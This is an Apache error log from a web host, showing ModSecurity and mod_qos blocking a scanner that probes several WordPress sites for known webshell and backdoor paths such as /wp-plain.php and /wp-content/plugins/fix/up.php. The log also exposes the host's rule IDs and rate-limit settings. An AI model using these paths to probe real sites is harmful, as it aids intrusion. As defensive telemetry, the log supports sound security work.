[Tue May 26 19:59:16.414933 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr6wAAADg"]
[Tue May 26 19:59:16.420936 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr7QAAAHc"]
[Tue May 26 19:59:16.422504 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252XgAAAa4"]
[Tue May 26 19:59:16.432870 2026] [security2:error] [pid 93576:tid 93750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr4wAAACY"]
[Tue May 26 19:59:16.434848 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr8QAAAGA"]
[Tue May 26 19:59:16.444839 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr6gAAAFA"]
[Tue May 26 19:59:16.540976 2026] [security2:error] [pid 93868:tid 94362] [client 66.132.195.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252jQAAAfc"]
[Tue May 26 19:59:16.606462 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuPGDRMqfxdEDkoszsVAAAAEg
[Tue May 26 19:59:16.606880 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuPGDRMqfxdEDkoszsYwAAAAg
[Tue May 26 19:59:16.608480 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsZQAAADQ
[Tue May 26 19:59:16.608861 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuPGDRMqfxdEDkoszsZgAAAGg
[Tue May 26 19:59:16.609924 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuPGDRMqfxdEDkoszsZwAAAE0
[Tue May 26 19:59:16.614826 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuPGDRMqfxdEDkoszsbAAAAG0
[Tue May 26 19:59:16.614831 2026] [qos:error] [pid 93868:tid 94355] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuPEqK9k_ZUB2Vp2528gAAAfA
[Tue May 26 19:59:16.614996 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuPGDRMqfxdEDkoszsawAAAD0
[Tue May 26 19:59:16.615060 2026] [qos:error] [pid 93868:tid 94344] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuPEqK9k_ZUB2Vp2528wAAAeU
[Tue May 26 19:59:16.619287 2026] [qos:error] [pid 93868:tid 94312] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuPEqK9k_ZUB2Vp2529wAAAcU
[Tue May 26 19:59:16.619530 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuPGDRMqfxdEDkoszscAAAAGc
[Tue May 26 19:59:16.661983 2026] [security2:error] [pid 93868:tid 94270] [client 45.92.1.17:57959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-plain.php"] [unique_id "ahWuPEqK9k_ZUB2Vp252-gAAAZs"], referer: www.google.com
[Tue May 26 19:59:16.666082 2026] [security2:error] [pid 93868:tid 94273] [client 45.92.1.17:57963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPEqK9k_ZUB2Vp252_AAAAZ4"], referer: www.google.com
[Tue May 26 19:59:16.678971 2026] [security2:error] [pid 93868:tid 94344] [client 45.92.1.17:57976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPEqK9k_ZUB2Vp253AAAAAeU"]
[Tue May 26 19:59:16.719431 2026] [security2:error] [pid 93868:tid 94336] [client 45.92.1.17:57987] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPEqK9k_ZUB2Vp253AQAAAd0"]
[Tue May 26 19:59:16.723241 2026] [security2:error] [pid 93868:tid 94339] [client 45.92.1.17:57986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPEqK9k_ZUB2Vp253BAAAAeA"], referer: www.google.com
[Tue May 26 19:59:16.732855 2026] [security2:error] [pid 93868:tid 94331] [client 45.92.1.17:57988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/wp-plain.php"] [unique_id "ahWuPEqK9k_ZUB2Vp253BgAAAdg"], referer: www.google.com
[Tue May 26 19:59:16.760211 2026] [security2:error] [pid 93868:tid 94343] [client 45.92.1.17:58012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPEqK9k_ZUB2Vp253DAAAAeQ"]
[Tue May 26 19:59:16.761005 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsdwAAACc
[Tue May 26 19:59:16.762021 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszseQAAACc
[Tue May 26 19:59:16.762474 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszseAAAAGo
[Tue May 26 19:59:16.762997 2026] [security2:error] [pid 93868:tid 94376] [client 45.92.1.17:58010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-plain.php"] [unique_id "ahWuPEqK9k_ZUB2Vp253DwAAAgU"], referer: www.google.com
[Tue May 26 19:59:16.763805 2026] [security2:error] [pid 93576:tid 93810] [client 45.92.1.17:58011] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPGDRMqfxdEDkoszsegAAAGI"], referer: www.google.com
[Tue May 26 19:59:16.764831 2026] [qos:error] [pid 93868:tid 94299] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPEqK9k_ZUB2Vp253EQAAAbg
[Tue May 26 19:59:16.767393 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsfQAAAEU
[Tue May 26 19:59:16.769139 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuPGDRMqfxdEDkoszsfwAAAE4
[Tue May 26 19:59:16.769199 2026] [qos:error] [pid 93868:tid 94344] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuPEqK9k_ZUB2Vp253EwAAAeU
[Tue May 26 19:59:16.769924 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsgAAAADQ
[Tue May 26 19:59:16.770451 2026] [security2:error] [pid 93576:tid 93816] [client 45.92.1.17:58024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPGDRMqfxdEDkoszsgQAAAGg"], referer: www.google.com
[Tue May 26 19:59:16.770769 2026] [security2:error] [pid 93576:tid 93764] [client 45.92.1.17:58023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-plain.php"] [unique_id "ahWuPGDRMqfxdEDkoszsggAAADQ"], referer: www.google.com
[Tue May 26 19:59:16.772065 2026] [security2:error] [pid 93868:tid 94305] [client 45.92.1.17:58025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPEqK9k_ZUB2Vp253FAAAAb4"]
[Tue May 26 19:59:16.773755 2026] [qos:error] [pid 93576:tid 93723] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszshAAAAAs
[Tue May 26 19:59:16.777524 2026] [qos:error] [pid 93868:tid 94331] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPEqK9k_ZUB2Vp253FgAAAdg
[Tue May 26 19:59:16.878843 2026] [security2:error] [pid 93868:tid 94268] [client 45.92.1.17:57958] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "filosha.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp252-wAAAZk"], referer: www.google.com
[Tue May 26 19:59:16.880941 2026] [security2:error] [pid 93576:tid 93767] [client 45.92.1.17:58091] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPGDRMqfxdEDkoszsjgAAADc"]
[Tue May 26 19:59:16.883184 2026] [security2:error] [pid 93576:tid 93736] [client 45.92.1.17:58078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-plain.php"] [unique_id "ahWuPGDRMqfxdEDkoszskAAAABg"], referer: www.google.com
[Tue May 26 19:59:16.883918 2026] [security2:error] [pid 93576:tid 93736] [client 45.92.1.17:58082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPGDRMqfxdEDkoszskQAAABg"]
[Tue May 26 19:59:16.886511 2026] [security2:error] [pid 93576:tid 93831] [client 45.92.1.17:58089] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/wp-plain.php"] [unique_id "ahWuPGDRMqfxdEDkoszslAAAAHc"], referer: www.google.com
[Tue May 26 19:59:16.886539 2026] [security2:error] [pid 93576:tid 93799] [client 45.92.1.17:58083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPGDRMqfxdEDkoszskwAAAFc"], referer: www.google.com
[Tue May 26 19:59:16.887703 2026] [security2:error] [pid 93576:tid 93772] [client 45.92.1.17:58090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPGDRMqfxdEDkoszslQAAADw"], referer: www.google.com
[Tue May 26 19:59:16.965096 2026] [security2:error] [pid 93576:tid 93724] [client 45.92.1.17:58165] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "filosha.com"] [uri "/spaopoqb.php"] [unique_id "ahWuPGDRMqfxdEDkoszslwAAAAw"], referer: www.google.com
[Tue May 26 19:59:16.987560 2026] [qos:error] [pid 93868:tid 94331] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPEqK9k_ZUB2Vp253HAAAAdg
[Tue May 26 19:59:16.989440 2026] [qos:error] [pid 93576:tid 93808] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsmAAAAGA
[Tue May 26 19:59:16.990540 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsmQAAAFI
[Tue May 26 19:59:16.993067 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsmgAAACc
[Tue May 26 19:59:16.993070 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsmwAAAFA
[Tue May 26 19:59:16.996614 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsnQAAAH0
[Tue May 26 19:59:16.996962 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsnAAAAGo
[Tue May 26 19:59:16.999652 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsnwAAAEU
[Tue May 26 19:59:17.001162 2026] [qos:error] [pid 93868:tid 94375] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPEqK9k_ZUB2Vp253HgAAAgQ
[Tue May 26 19:59:17.003617 2026] [qos:error] [pid 93868:tid 94300] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253HwAAAbk
[Tue May 26 19:59:17.023421 2026] [security2:error] [pid 93576:tid 93812] [client 45.92.1.17:58219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/ogbhedss.php"] [unique_id "ahWuPWDRMqfxdEDkoszsogAAAGQ"], referer: www.google.com
[Tue May 26 19:59:17.024127 2026] [security2:error] [pid 93576:tid 93759] [client 45.92.1.17:58218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPWDRMqfxdEDkoszsoQAAAC8"]
[Tue May 26 19:59:17.026978 2026] [security2:error] [pid 93576:tid 93754] [client 45.92.1.17:58221] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-plain.php"] [unique_id "ahWuPWDRMqfxdEDkoszspAAAACo"], referer: www.google.com
[Tue May 26 19:59:17.028360 2026] [security2:error] [pid 93576:tid 93775] [client 45.92.1.17:58222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPWDRMqfxdEDkoszspgAAAD8"], referer: www.google.com
[Tue May 26 19:59:17.052237 2026] [security2:error] [pid 93576:tid 93799] [client 45.92.1.17:58241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/bhppakpm.php"] [unique_id "ahWuPWDRMqfxdEDkoszsqgAAAFc"], referer: www.google.com
[Tue May 26 19:59:17.070056 2026] [security2:error] [pid 93576:tid 93760] [client 45.92.1.17:58242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/qxskviit.php"] [unique_id "ahWuPWDRMqfxdEDkoszsqwAAADA"], referer: www.google.com
[Tue May 26 19:59:17.109794 2026] [security2:error] [pid 93576:tid 93823] [client 45.92.1.17:58163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPWDRMqfxdEDkoszsrAAAAG8"], referer: www.google.com
[Tue May 26 19:59:17.138286 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253IgAAAe8
[Tue May 26 19:59:17.141741 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkoszsrwAAAGc
[Tue May 26 19:59:17.143864 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkoszssQAAACI
[Tue May 26 19:59:17.144228 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkoszssgAAAEA
[Tue May 26 19:59:17.145172 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkoszsswAAACQ
[Tue May 26 19:59:17.147339 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkoszstAAAAF8
[Tue May 26 19:59:17.149635 2026] [qos:error] [pid 93576:tid 93824] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkoszstgAAAHA
[Tue May 26 19:59:17.151731 2026] [qos:error] [pid 93868:tid 94305] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253IwAAAb4
[Tue May 26 19:59:17.156579 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkoszstwAAAGs
[Tue May 26 19:59:17.162750 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253JAAAAdE
[Tue May 26 19:59:17.169492 2026] [security2:error] [pid 93576:tid 93816] [client 45.92.1.17:58220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPWDRMqfxdEDkoszsuAAAAGg"], referer: www.google.com
[Tue May 26 19:59:17.174404 2026] [security2:error] [pid 93576:tid 93713] [client 45.92.1.17:58300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/bgperweu.php"] [unique_id "ahWuPWDRMqfxdEDkoszsuQAAAAE"], referer: www.google.com
[Tue May 26 19:59:17.177776 2026] [security2:error] [pid 93868:tid 94270] [client 45.92.1.17:58302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/kzbxwxip.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253JQAAAZs"], referer: www.google.com
[Tue May 26 19:59:17.182337 2026] [security2:error] [pid 93576:tid 93801] [client 45.92.1.17:58088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuPWDRMqfxdEDkoszsuwAAAFk"]
